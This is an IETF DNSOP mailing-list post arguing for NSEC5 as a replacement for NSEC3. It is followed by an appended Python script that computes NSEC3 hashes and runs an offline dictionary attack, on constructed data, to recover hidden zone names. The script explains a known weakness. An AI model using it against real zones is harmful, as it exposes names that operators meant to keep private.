Here are some of my arguments in support of NSEC5.

I would like to see us deploy an authenticated denial of existence
mechanism that is not eminently susceptible to offline dictionary
attack. My experience so far is that most people in the crypto
community do not look favorably on NSEC3. Not just Dan Bernstein,
whose strong criticisms are well known (and correct in my opinion).
IETF protocols should pass muster with the professional cryptographer
community.

I don't mean to bash NSEC3 - I think it was the best solution at the
time given the constraints we imposed on ourselves. But it might be
time to look forward.

I certainly agree that the deployment challenges are significant.
But we have several similar challenges already on the radar, which
we will have to tackle:

  - EdDSA

  - NSEC3 hash replacement

    (The recent SHA-1 collision news does not pose an immediate threat
    to NSEC3, but will surely put pressure on us to upgrade the hash
    algorithm on the well known principle that attacks will inevitably
    get better fast.)

  - Post Quantum Crypto algorithms (slightly longer term, but something we
    need to start designing very soon).

I also wonder, given the challenges of deploying new algorithms, and
the downsides to multiple signing due to packet size concerns - is it
time to design an algorithm negotiation protocol for DNSSEC? It would
have the same initial deployment challenge, but then could help out with
new algorithm transitions going forward.

Arguably, there is an additional "implementation challenge" for NSEC5,
which is a bit more complex than rolling out just a new DNSSEC algorithm.
But I think the implementation work already done presents a positive
picture.

I know several additional folks who have expressed interest in NSEC5 -
I hope they'll speak up.

On Fri, Mar 10, 2017 at 12:46 PM, Warren Kumari <war...@kumari.net> wrote:

> Especially with the prevalence of passive DNS services, I believe that
> publishing something in the DNS makes it "public" - sure, you can hide
> some things behind split-DNS, but putting `super-skrit-key.exmaple.com
> IN 600 TXT "Hunter3"` is guaranteed to end poorly.
>
> NSEC5 has some very cute tricks, but I don't agree with the premise
> that it solves a real world problem.
>

Apparently there are many folks in the community who think so, otherwise
NSEC3 would not have been developed. I personally don't care for any zones
that I run. But if we are providing a solution for folks that do care, we
should have the most secure (yet practical) solution we know how to design.

-- 
Shumon Huque
_______________________________________________
DNSOP mailing list
DNSOP@ietf.org
https://www.ietf.org/mailman/listinfo/dnsop

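As an added illustration of the offline dictionary attack referred to in the message above (editor-added example code, not part of the original thread nor of any NSEC3 or NSEC5 implementation): the block below implements the RFC 5155 NSEC3 hash (iterated SHA-1 over the canonical wire-format owner name plus salt, base32hex-encoded) and then guesses hashed owner names from a wordlist, which is all an attacker needs once they have collected the NSEC3 records a zone hands out in its denial-of-existence responses. The zone name, salt, iteration count, the "hidden" labels and the wordlist are all constructed for the demonstration; `dictionary_attack` and `run_demo` are names chosen here, not standard APIs.

```python
"""Offline dictionary attack against NSEC3 hashed owner names (RFC 5155).

Added example, not from the original DNSOP thread.  Everything below the
hash implementation (zone, salt, iterations, hidden labels, wordlist) is
constructed for illustration.
"""
import base64
import hashlib

# Positional map from the RFC 4648 base32 alphabet to the base32hex alphabet.
_B32_TO_B32HEX = str.maketrans(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567",
    "0123456789ABCDEFGHIJKLMNOPQRSTUV",
)


def name_to_wire(name: str) -> bytes:
    """Canonical wire form (RFC 4034 s6.2): lowercase, length-prefixed labels, root label.

    Assumption: plain ASCII labels; escaped or binary labels are not handled here.
    """
    labels = [lbl for lbl in name.lower().rstrip(".").split(".") if lbl]
    for lbl in labels:
        if len(lbl) > 63:
            raise ValueError("label too long: %r" % lbl)
    return b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in labels) + b"\x00"


def base32hex(data: bytes) -> str:
    """RFC 4648 base32hex without padding, the encoding NSEC3 owner labels use."""
    std = base64.b32encode(data).decode("ascii").rstrip("=")
    return std.translate(_B32_TO_B32HEX)


def nsec3_hash(name: str, salt: bytes, iterations: int) -> str:
    """RFC 5155 s5: IH(0) = H(name || salt); IH(k) = H(IH(k-1) || salt); output IH(iterations).

    H is SHA-1 (hash algorithm 1, the only one defined for NSEC3).  A 20-byte
    digest encodes to exactly 32 base32hex characters; returned lowercase as
    it usually appears in zone files.
    """
    digest = hashlib.sha1(name_to_wire(name) + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    return base32hex(digest).lower()


def dictionary_attack(leaked_hashes, zone, salt, iterations, wordlist):
    """Map every leaked NSEC3 owner hash we can guess back to its plaintext name.

    Entirely offline: the salt and iteration count are public (NSEC3PARAM),
    so each candidate <word>.<zone> costs the attacker iterations+1 SHA-1
    calls, exactly what a validating resolver pays.  The salt only stops a
    table precomputed for another zone from being reused; it does nothing
    against guessing within this zone.
    """
    targets = {h.lower() for h in leaked_hashes}
    recovered = {}
    for word in wordlist:
        candidate = "%s.%s" % (word, zone)
        h = nsec3_hash(candidate, salt, iterations)
        if h in targets:
            recovered[h] = candidate
    return recovered


# ---- constructed scenario -------------------------------------------------
ZONE = "example.com"                 # constructed zone
SALT = bytes.fromhex("aabbccdd")     # constructed salt, published in NSEC3PARAM
ITERATIONS = 10                      # constructed iteration count, also public
# Labels the operator hoped NSEC3 would keep private.  The last one is a
# random-looking label that no wordlist will contain.
HIDDEN = ["www", "mail", "vpn", "staging-db", "xq7pz2k1"]
# What an attacker collects by walking the hashed NSEC3 chain via NXDOMAIN replies.
LEAKED = [nsec3_hash("%s.%s" % (lbl, ZONE), SALT, ITERATIONS) for lbl in HIDDEN]
# Constructed wordlist of common hostnames.
WORDLIST = ["www", "ftp", "mail", "vpn", "dev", "staging-db", "intranet", "git"]


def run_demo():
    """Return the recovered names; the random label xq7pz2k1 stays hidden only because
    it is not guessable, which is the entire security margin NSEC3 offers."""
    return dictionary_attack(LEAKED, ZONE, SALT, ITERATIONS, WORDLIST)


if __name__ == "__main__":
    for h, name in sorted(run_demo().items()):
        print("%s.%s -> %s" % (h, ZONE, name))
```

To check the hash implementation itself, compare its output against the signed zone in RFC 5155 Appendix A (zone `example.`, salt `aabbccdd`, 12 iterations), whose NSEC3 owner names are the hashes of the zone's names. Note that nothing here relies on the SHA-1 collision news mentioned in the message: the attack works because the space of plausible owner names is small and enumerable, and swapping in a stronger hash would not change that.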